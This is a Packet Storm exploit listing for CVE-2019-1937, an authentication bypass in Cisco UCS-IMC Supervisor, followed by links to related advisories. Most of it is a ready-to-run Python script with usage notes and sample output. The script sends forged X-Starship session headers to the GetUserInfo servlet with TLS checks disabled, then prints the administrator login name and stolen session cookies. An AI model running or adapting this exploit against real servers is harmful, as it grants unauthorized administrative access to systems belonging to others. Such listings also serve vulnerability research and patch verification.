Lucene search
Fatih SencerPACKETSTORM:173531HistoryJul 17, 2023 - 12:00 a.m.
Cisco UCS-IMC Supervisor 2.2.0.0 Authentication Bypass
2023-07-1700:00:00
Fatih Sencer
packetstormsecurity.com
114
cisco
imc supervisor
authentication bypass
pedro ribeiro
fatih sencer
vulnerability
getuserinfo
cve-2019-1937
exploit
0.406 Medium
EPSS
Percentile
97.3%
`[+] Exploit Title: Cisco UCS-IMC Supervisor 2.2.0.0 - Authentication Bypass
[+] Cisco IMC Supervisor - < 2.2.1.0
[+] Date: 08/21/2019
[+] Affected Component: /app/ui/ClientServlet?apiName=GetUserInfo
[+] Vendor: https://www.cisco.com/c/en/us/products/servers-unified-computing/integrated-management-controller-imc-supervisor/index.html
[+] Vulnerability Discovery : Pedro Ribeiro
[+] Exploit Author: Fatih Sencer
[+] CVE: CVE-2019-1937
----------------------------------------------------
Usage:
./python3 CiscoIMC-Bypass.py -u host
[+] Target https://xxxxxx.com
[+] Target OK
[+] Exploit Succes
[+] Login name : admin
[+] Cookie : REACTED
"""
import argparse,requests,warnings,base64,json,random,string
from requests.packages.urllib3.exceptions import InsecureRequestWarning
warnings.simplefilter('ignore',InsecureRequestWarning)
def init():
parser = argparse.ArgumentParser(description='Cisco IMC Supervisor / Authentication Bypass')
parser.add_argument('-u','--host',help='Host', type=str, required=True)
args = parser.parse_args()
exploit(args)
def exploit(args):
session = requests.Session()
headers = {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_4)",
"X-Requested-With": "XMLHttpRequest",
"Referer": "https://{}/".format(args.host),
"X-Starship-UserSession-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10)),
"X-Starship-Request-Key": ''.join(random.choices(string.ascii_uppercase + string.digits, k=10))
}
target = "https://{}/app/ui/ClientServlet?apiName=GetUserInfo".format(args.host)
print("[+] Target {}".format(args.host))
exp_send = session.get(target, headers=headers, verify=False, timeout=10)
if exp_send.status_code == 200:
print("[+] Target OK")
body_data = json.loads(exp_send.text)
if not (body_data.get('loginName') is None):
print("[+] Exploit Succes")
print("[+] Login name : {}".format(body_data.get('loginName')))
print("[+] Cookie : {}".format(session.cookies.get_dict()))
else:
print("[-] Exploit Failed")
else:
print("[-] N/A")
exit()
if __name__ == "__main__":
init()
`
Related
saint
saint
Cisco UCS Director authentication bypass and command injection
2019-09-13 00:00:00
Cisco UCS Director authentication bypass and command injection
2019-09-13 00:00:00
Cisco UCS Director authentication bypass and command injection
2019-09-13 00:00:00
cisco
cisco
zdt
zdt
prion
prion
Design/Logic Flaw
2019-08-21 19:15:00
nvd
nvd
CVE-2019-1937
2019-08-21 19:15:15
cve
cve
CVE-2019-1937
2019-08-21 19:15:15
checkpoint_advisories
checkpoint_advisories
Cisco UCS Director Web Interface Authentication Bypass (CVE-2019-1937)
2019-09-16 00:00:00
cvelist
cvelist
nessus
nessus
Cisco UCS Director Authentication Bypass (cisco-sa-20190821-imcs-ucs-authby)
2019-08-26 00:00:00
exploitdb
exploitdb
metasploit
metasploit
Cisco UCS Director Unauthenticated Remote Code Execution
2019-08-28 03:55:49
packetstorm
packetstorm
Cisco UCS Director Unauthenticated Remote Code Execution
2019-09-02 00:00:00
Cisco UCS / IMC Supervisor Authentication Bypass / Command Injection
2019-08-28 00:00:00
exploitpack
exploitpack
threatpost
threatpost
Cisco Patches Six Critical Bugs in UCS Gear and Switches
2019-08-21 17:38:24